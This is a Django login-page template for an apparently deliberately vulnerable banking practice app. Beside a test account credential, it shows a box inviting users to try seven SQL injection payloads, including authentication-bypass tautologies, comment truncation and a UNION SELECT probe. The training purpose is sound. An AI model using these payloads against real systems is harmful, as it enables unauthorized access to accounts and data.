{% extends "banking_env/base.html" %}
{% load static %}

{% block content %}
<style>
.payload-box {
    background: #1e1e1e;
    padding: 12px 18px;
    border-radius: 10px;
    margin-top: 10px;
    color: #eee;
    border-left: 4px solid #00bcd4;
}

.payload-title {
    margin: 0 0 8px;
    font-weight: bold;
    color: #00e5ff;
}

.payload-box ul {
    margin: 0;
    padding-left: 20px;
}

.payload-box li {
    margin-bottom: 5px;
    font-size: 0.9rem;
}
</style>

<div class="auth-page">
    <div class="auth-box">
        <h2>🔐 User Login</h2>

        {% if error %}
        <p class="error">{{ error }}</p>
        {% endif %}

        <form method="POST">
            {% csrf_token %}
            <label>Username</label>
            <input type="text" name="username" required>

            <label>Password</label>
            <input type="password" name="password">

            <button type="submit" class="btn full">Login</button>
        </form>

       <p class="small-hint">Test accounts: <b>ranim / password123</b></p>

    <div class="payload-box">
        <p class="payload-title"> Try SQL Injection Payloads:</p>
        <ul>
            <li><code>' OR '1'='1</code></li>
            <li><code>' OR 1=1--</code></li>
            <li><code>" OR ""="</code></li>
            <li><code>admin' --</code></li>
            <li><code>admin' #</code></li>
            <li><code>' UNION SELECT NULL, NULL, NULL--</code></li>
            <li><code>') OR ('1'='1</code></li>
        </ul>
</div>
    </div>
</div>
{% endblock %}
